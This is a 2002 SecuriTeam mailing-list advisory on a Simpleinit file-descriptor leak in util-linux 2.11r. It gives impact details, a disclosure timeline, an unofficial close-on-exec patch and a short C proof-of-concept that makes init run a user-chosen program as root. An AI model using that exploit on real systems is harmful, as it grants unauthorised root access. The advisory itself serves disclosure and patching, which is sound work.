[UNIX] Simpleinit File Descriptor Security Vulnerability
From: support@securiteam.comDate: 06/24/02
- Previous message: support@securiteam.com: "[UNIX] Sharity Cifslogin Buffer Overflow (Arguments)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Mon, 24 Jun 2002 22:04:22 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Simpleinit File Descriptor Security Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.atnf.csiro.au/people/rgooch/linux/boot-scripts/> Simpleinit
is an init program for Linux systems. It is included in the util-linux
distribution. A security vulnerability in the product is cause because the
product has been found to leave a file descriptor open in some child
processes.
DETAILS
Vulnerable systems:
* util-linux version 2.11r
Simpleinit leaves a file descriptor open in some child processes.
The descriptor is used by Simpleinit to read messages from a FIFO
(/dev/initctl); this FIFO is normally used by the initctl, need, and
provide programs to pass instructions to Simpleinit . However, Simpleinit
opens the FIFO read-write, so any process that inherits the descriptor can
pass instructions to Simpleinit.
(Opening the FIFO read-write is not a bug; rather it ensures there is
always a writer for the FIFO, so EOF is not reported.)
Impact:
A local user with a process that inherits the file descriptor can easily
cause Simpleinit to execute an arbitrary program or script with root
privileges. There are assuredly numerous other local exploits.
There may also be some remote exploits. For example, if an ftp server
allows access to file descriptors through the /proc filesystem.
Not all processes inherit the file descriptors. Getty processes started
from lines in /etc/inittab do not, so users logging in on the virtual
consoles will typically not have access to this exploit. On the other
hand, if the boot scripts start xdm, then a user logging in through xdm
will be able to use the file descriptor.
Vendor notification:
<mailto:rgooch@atnf.csiro.au> Richard Gooch, the Simpleinit maintainer,
was notified of this problem May 20, 2002.
On May 26, I learned of the <http://www.winterdrache.de/linux/newboot/>
Simpleinit -msb variant, maintained by <mailto:m.s.b@gmx.net> Matthias
Benkmann, and notified him of this problem. He released a patched version
of Simpleinit -msb the same day.
Unofficial patch:
--- login-utils/Simpleinit .c.orig 2001-09-29 11:09:10.000000000 -0400
+++ login-utils/Simpleinit .c 2002-05-23 22:16:07.000000000 -0400
@@ -203,6 +203,18 @@
if ( ( initctl_fd = open (initctl_name, O_RDWR, 0) ) < 0 )
err ( _("error opening fifo\n") );
}
+ if ( initctl_fd >= 0 )
+ if ( fcntl (initctl_fd, F_SETFD, FD_CLOEXEC) != 0 ) {
+ err ( _("error setting close-on-exec on
/dev/initctl") );
+ /* Can the fcntl ever fail? If it does, and we
leave
+ the descriptor open in child processes, then
any
+ process on the system will be able to write to
+ /dev/initctl and have us execute arbitrary
commands
+ as root. So let's refuse to use the fifo in
this
+ case. */
+ close(initctl_fd);
+ initctl_fd = -1;
+ }
if ( want_single || (access (_PATH_SINGLE, R_OK) == 0) ) do_single ();
Exploit:
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "Simpleinit .h" /* From the util-linux source */
int main()
{
int fd = 3;
char buf[COMMAND_SIZE];
struct command_struct* cmd = (struct command_struct*) buf;
memset(buf, '\0', sizeof(buf));
cmd->command = COMMAND_NEED;
cmd->pid = 17;
cmd->ppid = 16;
strcpy(cmd->name, "/home/pat/x/foo"); /* foo will be run as root */
write(fd, buf, COMMAND_SIZE);
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:patsmith@pobox.com> Patrick
Smith.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Sharity Cifslogin Buffer Overflow (Arguments)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
